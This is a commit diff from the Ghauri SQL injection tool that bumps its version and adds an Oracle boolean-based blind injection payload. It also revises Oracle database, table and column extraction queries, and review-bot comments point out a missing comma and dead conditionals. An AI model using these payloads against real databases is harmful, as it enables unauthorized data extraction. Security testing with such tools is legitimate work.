  • updated code quality, fixed issue with Oracle column retrieval query..

  • r0oth3x49 committed 1 year ago
    42add9d6
    1 parent ebd8c81c
  • ■ ■ ■ ■
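--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-[![GitHub release](https://img.shields.io/badge/release-v1.1.5-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.5)
+[![GitHub release](https://img.shields.io/badge/release-v1.1.6-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.6)
 [![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
 [![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
 [![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)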
  • ■ ■ ■ ■
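--- a/ghauri/__init__.py
+++ b/ghauri/__init__.py
@@ -24,7 +24,7 @@
 
 """
 
-__version__ = "1.1.5"
+__version__ = "1.1.6"
 __author__ = "Nasir Khan (r0ot h3x49)"
 __license__ = "MIT"
 __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"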
  • ■ ■ ■ ■ ■
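--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -1602,6 +1602,15 @@
 "Oracle": {
 "boolean-based": [
 {
+"payload": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 01234 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)",
+"comments": [
+{"pref": "", "suf": ""},
+],
+"title": "Oracle boolean-based blind - Parameter replace",
+"vector": "(SELECT (CASE WHEN ([INFERENCE]) THEN 01234 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)",
+"dbms": "",
+},
+{
 "payload": "AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,0568) END) FROM DUAL) IS NULL",
 "comments": [
 {"pref": " ", "suf": "--"},
@@ -2004,7 +2013,7 @@
 "(SELECT TOP 1 name FROM {db}..syscolumns WHERE 1=1)",
 ],
 "Oracle": [
-"(SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE OWNER={db} AND TABLE_NAME={tbl})"
+"(SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TAB_COLUMNS WHERE OWNER={db} AND TABLE_NAME={tbl}) WHERE LIMIT=1)",
 ],
 }
 
@@ -2053,7 +2062,9 @@
 "(SELECT TOP 1 {col} FROM {tbl} WHERE 1=1)",
 ],
 "Oracle": [
-"(SELECT {col} FROM (SELECT qq.*,ROWNUM AS LIMIT FROM {tbl} qq ORDER BY ROWNUM) WHERE LIMIT=1)"
+"(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl} {col} ORDER BY ROWNUM) WHERE LIMIT=1)"
+"(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl}) WHERE LIMIT=1)",
+"(SELECT {col} FROM (SELECT qq.*,ROWNUM AS LIMIT FROM {tbl} qq ORDER BY ROWNUM) WHERE LIMIT=1)",
 ],
 }
 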
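Review bot: The first entry of the Oracle row-query list (new line 2065) has no trailing comma, so Python's implicit string concatenation fuses it with the string on line 2066 into a single list element; the list then holds two queries instead of three, and the first is two SELECTs glued together that can never be valid SQL. Add the comma: `"(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl} {col} ORDER BY ROWNUM) WHERE LIMIT=1)",`. That same query also writes `FROM {tbl} {col}`, which makes the column name double as the table alias; if that is deliberate a one-line comment above the entry would help, otherwise the `qq` alias used by the third entry looks like what was meant. The enclosing dict literal begins and ends outside the hunks shown.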
  • ■ ■ ■ ■ ■ ■
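--- a/ghauri/extractor/advance.py
+++ b/ghauri/extractor/advance.py
@@ -130,8 +130,6 @@
 if start != 0 and start > 0:
 if backend != "Oracle":
 start = start - 1
-if start == 0 and backend == "Oracle":
-start = 1
 logger.info("fetching database names")
 Response = collections.namedtuple(
 "Response",
@@ -321,6 +319,9 @@
 and "DB_NAME" in payload
 ):
 stop = stop + 1
+if start == 0 and backend == "Oracle":
+start = 1 if start == 0 else start
+stop = total + 1 if stop == total else stop + 1
 while start < stop:
 payloads = prepare_query_payload(
 backend=backend, offset=start, payload_string=payload
@@ -404,8 +405,6 @@
 if start != 0 and start > 0:
 if backend != "Oracle":
 start = start - 1
-if start == 0 and backend == "Oracle":
-start = 1
 logger.info(f"fetching tables for database: {database}")
 Response = collections.namedtuple(
 "Response",
@@ -506,6 +505,9 @@
 )
 return _temp
 payload = clean_up_offset_payload(payload, backend=backend)
+if start == 0 and backend == "Oracle":
+start = 1 if start == 0 else start
+stop = total + 1 if stop == total else stop + 1
 while start < stop:
 payloads = prepare_query_payload(
 backend=backend, offset=start, payload_string=payload
@@ -593,8 +595,6 @@
 if start != 0 and start > 0:
 if backend != "Oracle":
 start = start - 1
-if start == 0 and backend == "Oracle":
-start = 1
 logger.info(
 f"fetching columns for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'"
 )
@@ -698,6 +698,9 @@
 )
 return _temp
 payload = clean_up_offset_payload(payload, backend=backend)
+if start == 0 and backend == "Oracle":
+start = 1 if start == 0 else start
+stop = total + 1 if stop == total else stop + 1
 while start < stop:
 payloads = prepare_query_payload(
 backend=backend, offset=start, payload_string=payload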
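Review bot: Both conditional expressions in the Oracle offset block at new lines 322-324 are dead: the guard has already established `start == 0`, so `start = 1 if start == 0 else start` is simply `start = 1`, and `total + 1 if stop == total else stop + 1` evaluates to `stop + 1` in either branch. The identical three lines recur at new lines 508-510 and 701-703; collapsing each to `start = 1` and `stop = stop + 1` with a comment such as `# Oracle ROWNUM is 1-based: shift the [start, stop) window up by one` makes the intent readable. In the first hunk the new block also runs after the `stop = stop + 1` on old line 323, so an Oracle DB_NAME payload with `start == 0` now advances `stop` twice; if that double increment is intended it deserves a comment, otherwise it reads as an off-by-one. The enclosing functions begin and end outside the hunks shown.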
  • ■ ■ ■ ■
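--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@
 
 setup(
 name="ghauri",
-version="1.1.5",
+version="1.1.6",
 description="An advanced SQL injection detection & exploitation tool.",
 classifiers=["Programming Language :: Python3"],
 author="Nasir Khan",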